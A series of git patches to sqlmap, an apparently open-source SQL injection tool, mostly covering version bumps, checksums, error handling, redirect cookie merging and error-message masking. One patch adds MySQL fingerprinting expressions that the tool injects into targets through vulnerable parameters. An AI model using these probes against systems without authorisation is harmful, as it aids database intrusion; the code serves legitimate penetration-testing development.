lib/core/unescaper.py @@ -59,7 +59,7 @@ c40758411bb0bd68764d78e0bb72bd0f lib/core/unescaper.py e772deb63270375e685fa5a7b775c382 lib/core/wordlist.py 1e5532ede194ac9c083891c2f02bca93 lib/__init__.py 7620f1f4b8791e13c7184c06b5421754 lib/parse/banner.py -2b3b021a8e7e119d0553c02b110d07d9 lib/parse/cmdline.py +3dd11b8be62e15a9d54cf5f08c603ffc lib/parse/cmdline.py fb2e2f05dde98caeac6ccf3e67192177 lib/parse/configfile.py 3794ff139869f5ae8e81cfdbe5714f56 lib/parse/handler.py 6bab53ea9d75bc9bb8169d3e8f3f149f lib/parse/headers.py From c0947846f4bc60c92f15f3270bc9a0088f57b322 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Fri, 29 Jun 2018 16:33:17 +0200 Subject: [PATCH 186/428] Patch for #3164 --- lib/core/option.py | 2 +- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 4 insertions(+), 4 deletions(-) diff --git a/lib/core/option.py b/lib/core/option.py index 4d30bc0ce17..29cb4acf09c 100644 --- a/lib/core/option.py +++ b/lib/core/option.py @@ -1409,7 +1409,7 @@ def _createTemporaryDirectory(): try: if not os.path.isdir(tempfile.gettempdir()): os.makedirs(tempfile.gettempdir()) - except (OSError, IOError, WindowsError), ex: + except Exception, ex: warnMsg = "there has been a problem while accessing " warnMsg += "system's temporary directory location(s) ('%s'). Please " % getSafeExString(ex) warnMsg += "make sure that there is enough disk space left. If problem persists, " diff --git a/lib/core/settings.py b/lib/core/settings.py index 1a2581c74cd..e87ff8f6214 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.6.36" +VERSION = "1.2.6.37" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 5a53224d667..68ec5339fb5 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -41,14 +41,14 @@ cada93357a7321655927fc9625b3bfec lib/core/exception.py 1e5532ede194ac9c083891c2f02bca93 lib/core/__init__.py 458a194764805cd8312c14ecd4be4d1e lib/core/log.py 13c0a490b5a928b64236b4a15e578267 lib/core/optiondict.py -4ef6c718b5069f7468c647b5e29fd3db lib/core/option.py +ddb06c1293bede33d9f062b64a67f953 lib/core/option.py c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 6783160150b4711d02c56ee2beadffdb lib/core/profiling.py 6f654e1715571eff68a0f8af3d62dcf8 lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -770a509eb586d686c1ca318171d17a33 lib/core/settings.py +56bf00aeba166450dff4161d11755e8b lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 95f04c1c1d8c3998d86e1bdf0e12771c lib/core/target.py From fae97b393731bf156303497604105ec1c1709f6b Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Fri, 29 Jun 2018 16:34:16 +0200 Subject: [PATCH 187/428] Another patch for #3164 --- lib/core/option.py | 4 ++-- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 5 insertions(+), 5 deletions(-) diff --git a/lib/core/option.py b/lib/core/option.py index 29cb4acf09c..ee2d64112f7 100644 --- a/lib/core/option.py +++ b/lib/core/option.py @@ -1420,7 +1420,7 @@ def _createTemporaryDirectory(): if "sqlmap" not in (tempfile.tempdir or "") or conf.tmpDir and tempfile.tempdir == conf.tmpDir: try: tempfile.tempdir = tempfile.mkdtemp(prefix="sqlmap", suffix=str(os.getpid())) - except (OSError, IOError, WindowsError): + except: tempfile.tempdir = os.path.join(paths.SQLMAP_HOME_PATH, "tmp", "sqlmap%s%d" % (randomStr(6), os.getpid())) kb.tempDir = tempfile.tempdir @@ -1428,7 +1428,7 @@ def _createTemporaryDirectory(): if not os.path.isdir(tempfile.tempdir): try: os.makedirs(tempfile.tempdir) - except (OSError, IOError, WindowsError), ex: + except Exception, ex: errMsg = "there has been a problem while setting " errMsg += "temporary directory location ('%s')" % getSafeExString(ex) raise SqlmapSystemException(errMsg) diff --git a/lib/core/settings.py b/lib/core/settings.py index e87ff8f6214..78437654188 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.6.37" +VERSION = "1.2.6.38" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 68ec5339fb5..f81308677a8 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -41,14 +41,14 @@ cada93357a7321655927fc9625b3bfec lib/core/exception.py 1e5532ede194ac9c083891c2f02bca93 lib/core/__init__.py 458a194764805cd8312c14ecd4be4d1e lib/core/log.py 13c0a490b5a928b64236b4a15e578267 lib/core/optiondict.py -ddb06c1293bede33d9f062b64a67f953 lib/core/option.py +c82dee0f62e729213b92f5ec85f74b70 lib/core/option.py c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 6783160150b4711d02c56ee2beadffdb lib/core/profiling.py 6f654e1715571eff68a0f8af3d62dcf8 lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -56bf00aeba166450dff4161d11755e8b lib/core/settings.py +cf3cd30872fdf466ebad56e425c72376 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 95f04c1c1d8c3998d86e1bdf0e12771c lib/core/target.py From 73b0de67b561f156c31c549586e06e48cdbe1cda Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Fri, 29 Jun 2018 22:37:57 +0200 Subject: [PATCH 188/428] Fixes #3149 --- lib/core/settings.py | 2 +- lib/request/redirecthandler.py | 20 ++++++++++++++------ txt/checksum.md5 | 4 ++-- 3 files changed, 17 insertions(+), 9 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 78437654188..8096eb6f602 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.6.38" +VERSION = "1.2.6.39" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/request/redirecthandler.py b/lib/request/redirecthandler.py index 1642991f3ed..6d87937f288 100644 --- a/lib/request/redirecthandler.py +++ b/lib/request/redirecthandler.py @@ -5,7 +5,6 @@ See the file 'LICENSE' for copying permission """ -import re import time import types import urllib2 @@ -124,12 +123,21 @@ def http_error_302(self, req, fp, code, msg, headers): req.headers[HTTP_HEADER.HOST] = getHostHeader(redurl) if headers and HTTP_HEADER.SET_COOKIE in headers: + cookies = dict() delimiter = conf.cookieDel or DEFAULT_COOKIE_DELIMITER - _ = headers[HTTP_HEADER.SET_COOKIE].split(delimiter)[0] - if HTTP_HEADER.COOKIE not in req.headers: - req.headers[HTTP_HEADER.COOKIE] = _ - else: - req.headers[HTTP_HEADER.COOKIE] = re.sub(r"%s{2,}" % delimiter, delimiter, ("%s%s%s" % (re.sub(r"\b%s=[^%s]*%s?" % (re.escape(_.split('=')[0]), delimiter, delimiter), "", req.headers[HTTP_HEADER.COOKIE]), delimiter, _)).strip(delimiter)) + last = None + + for part in req.headers.get(HTTP_HEADER.COOKIE, "").split(delimiter) + headers.getheaders(HTTP_HEADER.SET_COOKIE): + if '=' in part: + part = part.strip() + key, value = part.split('=', 1) + cookies[key] = value + last = key + elif last: + cookies[key] += "%s%s" % (delimiter, part) + + req.headers[HTTP_HEADER.COOKIE] = delimiter.join("%s=%s" % (key, cookies[key]) for key in cookies) + try: result = urllib2.HTTPRedirectHandler.http_error_302(self, req, fp, code, msg, headers) except urllib2.HTTPError, e: diff --git a/txt/checksum.md5 b/txt/checksum.md5 index f81308677a8..19a6f867d6c 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -48,7 +48,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -cf3cd30872fdf466ebad56e425c72376 lib/core/settings.py +76d92cc81e93bb60ee7f5948dea88678 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 95f04c1c1d8c3998d86e1bdf0e12771c lib/core/target.py @@ -79,7 +79,7 @@ c2fb1abbb7127ec6419bbf852c0a458d lib/request/inject.py aaf956c1e9855836c3f372e29d481393 lib/request/methodrequest.py 51eeaa8abf5ba62aaaade66d46ff8b00 lib/request/pkihandler.py 2c3774b72586985719035b195f144d7b lib/request/rangehandler.py -aa809d825b33bea76a63ecd97cf7792c lib/request/redirecthandler.py +0d0567907afa2aa1493fb90ce09edfc0 lib/request/redirecthandler.py 7f12d8f3b6665ed7053954bba70ff718 lib/request/templates.py 747f9941a68361bd779ec760f71568e9 lib/takeover/abstraction.py acc1db3667bf910b809eb279b60595eb lib/takeover/icmpsh.py From 38ea0686a84e580369d0b3ce8f627f000bfe0f35 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Fri, 29 Jun 2018 22:48:43 +0200 Subject: [PATCH 189/428] Minor patch (Issue #3149) --- lib/core/settings.py | 2 +- lib/request/redirecthandler.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 4 insertions(+), 4 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 8096eb6f602..54095861025 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.6.39" +VERSION = "1.2.6.40" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/request/redirecthandler.py b/lib/request/redirecthandler.py index 6d87937f288..6248ce3c1dc 100644 --- a/lib/request/redirecthandler.py +++ b/lib/request/redirecthandler.py @@ -134,7 +134,7 @@ def http_error_302(self, req, fp, code, msg, headers): cookies[key] = value last = key elif last: - cookies[key] += "%s%s" % (delimiter, part) + cookies[last] += "%s%s" % (delimiter, part) req.headers[HTTP_HEADER.COOKIE] = delimiter.join("%s=%s" % (key, cookies[key]) for key in cookies) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 19a6f867d6c..496a5948ed8 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -48,7 +48,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -76d92cc81e93bb60ee7f5948dea88678 lib/core/settings.py +da93a924f9a99c51cab7d8e7adb2448d lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 95f04c1c1d8c3998d86e1bdf0e12771c lib/core/target.py @@ -79,7 +79,7 @@ c2fb1abbb7127ec6419bbf852c0a458d lib/request/inject.py aaf956c1e9855836c3f372e29d481393 lib/request/methodrequest.py 51eeaa8abf5ba62aaaade66d46ff8b00 lib/request/pkihandler.py 2c3774b72586985719035b195f144d7b lib/request/rangehandler.py -0d0567907afa2aa1493fb90ce09edfc0 lib/request/redirecthandler.py +3cd9d17fc52bb62db29e0e24fc4d8a97 lib/request/redirecthandler.py 7f12d8f3b6665ed7053954bba70ff718 lib/request/templates.py 747f9941a68361bd779ec760f71568e9 lib/takeover/abstraction.py acc1db3667bf910b809eb279b60595eb lib/takeover/icmpsh.py From e8336ecfe1e548f56672db31edcd7efa365058a3 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Fri, 29 Jun 2018 23:57:20 +0200 Subject: [PATCH 190/428] Fix of a pesky often 'statistical model' retrieval --- lib/core/settings.py | 2 +- lib/request/connect.py | 2 +- lib/request/inject.py | 3 ++- txt/checksum.md5 | 6 +++--- 4 files changed, 7 insertions(+), 6 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 54095861025..47123a53380 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.6.40" +VERSION = "1.2.6.41" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/request/connect.py b/lib/request/connect.py index dcfd675a8fc..612970b4899 100644 --- a/lib/request/connect.py +++ b/lib/request/connect.py @@ -1162,7 +1162,7 @@ def _randomizeParameter(paramString, randomParameter): singleTimeWarnMessage(warnMsg) warnMsg = "[%s] [WARNING] %stime-based comparison requires " % (time.strftime("%X"), "(case) " if kb.responseTimeMode else "") - warnMsg += "larger statistical model, please wait" + warnMsg += "%s statistical model, please wait" % ("larger" if len(kb.responseTimes) == 1 else "reset of") dataToStdout(warnMsg) while len(kb.responseTimes[kb.responseTimeMode]) < MIN_TIME_RESPONSES: diff --git a/lib/request/inject.py b/lib/request/inject.py index 89cfbd0d455..34271e1dfe2 100644 --- a/lib/request/inject.py +++ b/lib/request/inject.py @@ -440,7 +440,8 @@ def getValue(expression, blind=True, union=True, error=True, time=True, fromUser found = (value is not None) or (value is None and expectingNone) or count >= MAX_TECHNIQUES_PER_VALUE if time and (isTechniqueAvailable(PAYLOAD.TECHNIQUE.TIME) or isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED)) and not found: - kb.responseTimeMode = re.sub(r"(?i)[^a-z]", "", re.sub(r"'[^']+'", "", re.sub(r"(?i)(\w+)\(.+\)", r"\g<1>", expression))) if re.search(r"(?i)SELECT.+FROM", expression) else None + match = re.search(r"\bFROM\b ([^ ]+).+ORDER BY ([^ ]+)", expression) + kb.responseTimeMode = "%s|%s" % (match.group(1), match.group(2)) if match else None if isTechniqueAvailable(PAYLOAD.TECHNIQUE.TIME): kb.technique = PAYLOAD.TECHNIQUE.TIME diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 496a5948ed8..a0d0c862758 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -48,7 +48,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -da93a924f9a99c51cab7d8e7adb2448d lib/core/settings.py +2aab203a038a8c4d06794a9fdb878229 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 95f04c1c1d8c3998d86e1bdf0e12771c lib/core/target.py @@ -70,12 +70,12 @@ f2af274126ce0a789027d35d367f2b9e lib/parse/payloads.py 30eed3a92a04ed2c29770e1b10d39dc0 lib/request/basicauthhandler.py 2b81435f5a7519298c15c724e3194a0d lib/request/basic.py c0cabedead14b8a23353b606672cff42 lib/request/comparison.py -1b5491cc079384f08cbc6b397786e1af lib/request/connect.py +039f0f7cf997856fa2f6e8d5d69f7ae9 lib/request/connect.py dd4598675027fae99f2e2475b05986da lib/request/direct.py 2044fce3f4ffa268fcfaaf63241b1e64 lib/request/dns.py 98535d0efca5551e712fcc4b34a3f772 lib/request/httpshandler.py 1e5532ede194ac9c083891c2f02bca93 lib/request/__init__.py -c2fb1abbb7127ec6419bbf852c0a458d lib/request/inject.py +a5cbc19ee18bd4b848515eb3ea3291f0 lib/request/inject.py aaf956c1e9855836c3f372e29d481393 lib/request/methodrequest.py 51eeaa8abf5ba62aaaade66d46ff8b00 lib/request/pkihandler.py 2c3774b72586985719035b195f144d7b lib/request/rangehandler.py From 4b4f728d8e7f6001ff09850e1c3ad689e3582757 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 2 Jul 2018 10:58:25 +0200 Subject: [PATCH 191/428] Updated MySQL active fingerprint payloads --- lib/core/settings.py | 2 +- plugins/dbms/mysql/fingerprint.py | 23 +++++++++++++++++++---- txt/checksum.md5 | 4 ++-- 3 files changed, 22 insertions(+), 7 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 47123a53380..9cebb6fd486 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.6.41" +VERSION = "1.2.7.0" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/plugins/dbms/mysql/fingerprint.py b/plugins/dbms/mysql/fingerprint.py index 2e039532e27..ac9eabd967b 100644 --- a/plugins/dbms/mysql/fingerprint.py +++ b/plugins/dbms/mysql/fingerprint.py @@ -183,8 +183,15 @@ def checkDbms(self): # reading information_schema on some platforms is causing annoying timeout exits # Reference: http://bugs.mysql.com/bug.php?id=15855 + # Determine if it is MySQL >= 8.0.0 + if inject.checkBooleanExpression("ISNULL(JSON_STORAGE_FREE(NULL))"): + kb.data.has_information_schema = True + Backend.setVersion(">= 8.0.0") + setDbms("%s 8" % DBMS.MYSQL) + self.getBanner() + # Determine if it is MySQL >= 5.0.0 - if inject.checkBooleanExpression("ISNULL(TIMESTAMPADD(MINUTE,[RANDNUM],NULL))"): + elif inject.checkBooleanExpression("ISNULL(TIMESTAMPADD(MINUTE,[RANDNUM],NULL))"): kb.data.has_information_schema = True Backend.setVersion(">= 5.0.0") setDbms("%s 5" % DBMS.MYSQL) @@ -196,9 +203,17 @@ def checkDbms(self): infoMsg = "actively fingerprinting %s" % DBMS.MYSQL logger.info(infoMsg) - # Check if it is MySQL >= 5.5.0 - if inject.checkBooleanExpression("TO_SECONDS(950501)>0"): - Backend.setVersion(">= 5.5.0") + # Check if it is MySQL >= 5.7 + if inject.checkBooleanExpression("ISNULL(JSON_QUOTE(NULL))"): + Backend.setVersion(">= 5.7") + + # Check if it is MySQL >= 5.6 + elif inject.checkBooleanExpression("ISNULL(VALIDATE_PASSWORD_STRENGTH(NULL))"): + Backend.setVersion(">= 5.6") + + # Check if it is MySQL >= 5.5 + elif inject.checkBooleanExpression("TO_SECONDS(950501)>0"): + Backend.setVersion(">= 5.5") # Check if it is MySQL >= 5.1.2 and < 5.5.0 elif inject.checkBooleanExpression("@@table_open_cache=@@table_open_cache"): diff --git a/txt/checksum.md5 b/txt/checksum.md5 index a0d0c862758..c8a7bc6926a 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -48,7 +48,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -2aab203a038a8c4d06794a9fdb878229 lib/core/settings.py +9e328a8f6e8e76c8d78779a8041d47c7 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 95f04c1c1d8c3998d86e1bdf0e12771c lib/core/target.py @@ -171,7 +171,7 @@ f25c50a95e5390ecd32be5a011637349 plugins/dbms/mssqlserver/__init__.py f6e1f3f09f32b9cb2ca11c016d373423 plugins/dbms/mysql/connector.py 445164daf59b890aeacc968af58fcb53 plugins/dbms/mysql/enumeration.py 4578fa29f04d0a75499f9668466ded07 plugins/dbms/mysql/filesystem.py -fcbf7ff279c527b4aca0dac94c28d20c plugins/dbms/mysql/fingerprint.py +4e23494d0a8f41c22ec3861fb404e9f7 plugins/dbms/mysql/fingerprint.py 30065993f8300994e4658634121609e9 plugins/dbms/mysql/__init__.py 0e2adbee217f5b94dcc124d24b8dde99 plugins/dbms/mysql/syntax.py 403591e638b6bfdb840d52bd3138ee56 plugins/dbms/mysql/takeover.py From 48cd0421a6b7f03d26dd3087bd518c9ef66821ce Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 2 Jul 2018 11:41:36 +0200 Subject: [PATCH 192/428] Trivial style update --- lib/core/settings.py | 2 +- sqlmap.py | 3 ++- txt/checksum.md5 | 4 ++-- 3 files changed, 5 insertions(+), 4 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 9cebb6fd486..5cb20b4c6f8 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.7.0" +VERSION = "1.2.7.1" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/sqlmap.py b/sqlmap.py index 62d850da396..1cbf6001d3b 100755 --- a/sqlmap.py +++ b/sqlmap.py @@ -325,7 +325,8 @@ def main(): file_ = match.group(1) file_ = os.path.relpath(file_, os.path.dirname(__file__)) file_ = file_.replace("\\", '/') - file_ = re.sub(r"\.\./", '/', file_).lstrip('/') + file_ = re.sub(r"\.\./", '/', file_) + file_ = re.sub(r"/{2,}", '/', file_) excMsg = excMsg.replace(match.group(1), file_) errMsg = maskSensitiveData(errMsg) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index c8a7bc6926a..261995c131f 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -48,7 +48,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -9e328a8f6e8e76c8d78779a8041d47c7 lib/core/settings.py +fecf20f279fc20930aa35b26df99c76d lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 95f04c1c1d8c3998d86e1bdf0e12771c lib/core/target.py @@ -226,7 +226,7 @@ ec2ba8c757ac96425dcd2b97970edd3a shell/stagers/stager.asp_ 0c48ddb1feb7e38a951ef05a0d48e032 shell/stagers/stager.jsp_ 2f9e459a4cf6a58680978cdce5ff7971 shell/stagers/stager.php_ 4eaeef94314956e4517e5310a28d579a sqlmapapi.py -b6e9d67cafb85ff2c3fde165fc577a8d sqlmap.py +0295b082969b4dc2f164090d8b0c73db sqlmap.py 1a1e3a78ded58b240c9dbb1b17996acf tamper/0x2char.py 4c3b8a7daa4bff52e01d4168be0eedbe tamper/apostrophemask.py 4115a55b8aba464723d645b7d3156b6e tamper/apostrophenullencode.py From f92e1ebc40f5c415fa972427ece6b64a6b80a65e Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 2 Jul 2018 11:47:47 +0200 Subject: [PATCH 193/428] Another trivial style update --- lib/core/settings.py | 2 +- sqlmap.py | 5 ++++- txt/checksum.md5 | 4 ++-- 3 files changed, 7 insertions(+), 4 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 5cb20b4c6f8..f573a687f2e 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.7.1" +VERSION = "1.2.7.2" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/sqlmap.py b/sqlmap.py index 1cbf6001d3b..98e5eeeaeb1 100755 --- a/sqlmap.py +++ b/sqlmap.py @@ -325,7 +325,10 @@ def main(): file_ = match.group(1) file_ = os.path.relpath(file_, os.path.dirname(__file__)) file_ = file_.replace("\\", '/') - file_ = re.sub(r"\.\./", '/', file_) + if "../" in file_: + file_ = re.sub(r"(\.\./)+", '/', file_) + else: + file_ = file_.lstrip('/') file_ = re.sub(r"/{2,}", '/', file_) excMsg = excMsg.replace(match.group(1), file_) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 261995c131f..83b910191f3 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -48,7 +48,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -fecf20f279fc20930aa35b26df99c76d lib/core/settings.py +97ba609b383bae160c47d4b10b9f06a0 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 95f04c1c1d8c3998d86e1bdf0e12771c lib/core/target.py @@ -226,7 +226,7 @@ ec2ba8c757ac96425dcd2b97970edd3a shell/stagers/stager.asp_ 0c48ddb1feb7e38a951ef05a0d48e032 shell/stagers/stager.jsp_ 2f9e459a4cf6a58680978cdce5ff7971 shell/stagers/stager.php_ 4eaeef94314956e4517e5310a28d579a sqlmapapi.py -0295b082969b4dc2f164090d8b0c73db sqlmap.py +e59b4cba325d0e5184dce300ef052728 sqlmap.py 1a1e3a78ded58b240c9dbb1b17996acf tamper/0x2char.py 4c3b8a7daa4bff52e01d4168be0eedbe tamper/apostrophemask.py 4115a55b8aba464723d645b7d3156b6e tamper/apostrophenullencode.py From 4660b816d57ffa0b3534435f95c181be503e120a Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 2 Jul 2018 11:54:12 +0200 Subject: [PATCH 194/428] Minor patch (fallback for masking of sensitive data) --- lib/core/common.py | 3 +-- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 4 insertions(+), 5 deletions(-) diff --git a/lib/core/common.py b/lib/core/common.py index aef46a15498..d747a42ef80 100644 --- a/lib/core/common.py +++ b/lib/core/common.py @@ -3444,8 +3444,7 @@ def maskSensitiveData(msg): retVal = retVal.replace(value, '*' * len(value)) # Just in case (for problematic parameters regarding user encoding) - match = re.search(r"(?i)[ -]-(u|url|data|cookie)( |=)(.*?)( -?-[a-z]|\Z)", retVal) - if match: + for match in re.finditer(r"(?i)[ -]-(u|url|data|cookie)( |=)(.*?)( -?-[a-z]|\Z)", retVal): retVal = retVal.replace(match.group(3), '*' * len(match.group(3))) if getpass.getuser(): diff --git a/lib/core/settings.py b/lib/core/settings.py index f573a687f2e..38beabae9b3 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.7.2" +VERSION = "1.2.7.3" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 83b910191f3..9428342ee01 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -28,7 +28,7 @@ c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py 0adf547455a76dc71e6a599e52da1ed9 lib/core/agent.py fd8f239e259afaf5f24bcf34a0ad187f lib/core/bigarray.py -acec51826b280ad96dedbb56515e3988 lib/core/common.py +6c3ba41569f9403aef6cd9312fe9b96e lib/core/common.py 